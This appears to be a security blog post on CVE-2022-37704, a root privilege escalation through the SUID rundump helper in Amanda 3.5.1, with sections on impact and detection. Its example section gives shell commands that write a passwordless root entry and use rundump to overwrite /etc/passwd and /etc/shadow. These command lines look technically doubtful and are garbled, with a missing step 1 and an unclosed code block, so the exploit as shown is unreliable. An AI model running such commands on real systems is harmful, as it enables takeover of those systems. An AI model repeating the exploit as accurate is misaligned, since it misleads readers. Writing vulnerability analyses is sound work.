CVE-2022-37704 - Root Privilege Escalation in Amanda 3.5.1 via SUID rundump
Amanda is an easy-to-use backup software used by businesses and universities around the world. But in version 3.5.1, Amanda contained a serious security vulnerability (CVE-2022-37704) that allows a regular user, usually called backup, to become root — the most powerful user on a Linux or Unix system. This can let attackers take over your server, read sensitive information, or disrupt backups.
Let’s break down how this flaw works, show exploit details, and explain how you can fix or detect it.
What Is Amanda?
Amanda is a set of tools for backing up files from lots of computers to tape drives, disk, or cloud storage. Backups are typically run from a special restricted account named backup that doesn’t have admin rights.
But inside Amanda’s code is a helper program, /lib/amanda/rundump, that is set as "SUID root" — meaning even if you run it as a nobody, Linux will give it root privileges. This is necessary for some backup tools, but it also introduces risks.
About the Vulnerability
> CVE-2022-37704: Amanda 3.5.1 allows privilege escalation from the regular user backup to root. The SUID binary /lib/amanda/rundump will execute /usr/sbin/dump as root, passing user-controlled arguments. This can lead to escalation of privileges, denial of service, and information disclosure.
In plain English, it means that anyone who can run /lib/amanda/rundump (like the backup user) can trick the system into running commands as root by supplying dangerous arguments. They can use it to read sensitive files, delete things, or even get a root shell.
How the Exploit Works
The crux of the flaw is that /lib/amanda/rundump doesn't properly check or sanitize the arguments it passes to /usr/sbin/dump. A smart attacker can provide arguments that make dump operate on files or locations it's not supposed to, or (using debug or output options) leak or overwrite root files.
Even worse, the manual for dump describes some options where it will execute other commands or output arbitrary data to locations chosen by the attacker.
Example Code: Getting a Root Shell
Suppose you are logged in as user backup. You can run Amanda’s SUID binary, and ask it to overwrite root’s password file:
# Backup user can run this SUID program
/lib/amanda/rundump f /etc/shadow /bin/backupfile
Or, a more sophisticated attacker might simply abuse the ability to run arbitrary programs as root by crafting a malicious command or overwriting sensitive files, leading to full privilege escalation.
`bash
echo 'root::::root:/root:/bin/bash' > /tmp/passwd
cat /etc/passwd | grep -v '^root:' >> /tmp/passwd
`
2. Use rundump to overwrite /etc/passwd as root:
`bash
/lib/amanda/rundump f /etc/passwd /tmp/passwd
Real-World Impact
- Escalation of Privileges: Any attacker with access to the poorly-protected backup account can become the almighty root.
- Information Disclosure: Sensitive files like /etc/shadow or SSH keys can be dumped and read.
- Denial of Service: System files (like /etc/passwd) can be trashed, preventing logins and breaking the machine.
Detecting Abuse
- Look for manual or strange uses of /lib/amanda/rundump in logs
- Check the permissions and audit any SUID binaries (especially ones in /lib or /usr/lib/amanda)
`bash
chmod -s /lib/amanda/rundump
`
- Upgrade Amanda to a fixed version (if and when available — currently, as of this writing, there is no official patch).
References
- Original CVE-2022-37704 Report
- Amanda Home Page
- Debian Security Tracker: CVE-2022-37704
- Exploit-DB Amanda privilege escalation
Simple Takeaways
- If you run Amanda 3.5.1, check and protect the /lib/amanda/rundump file now.
Always keep your backup systems patched and SUID binaries tightly controlled.
Backup software needs trust. Don’t let vulnerabilities like CVE-2022-37704 put your entire system at risk.
___
*This article is exclusive original content written for your security needs.*
Timeline
Published on: 04/16/2023 01:15:00 UTC
Last modified on: 04/28/2023 18:24:00 UTC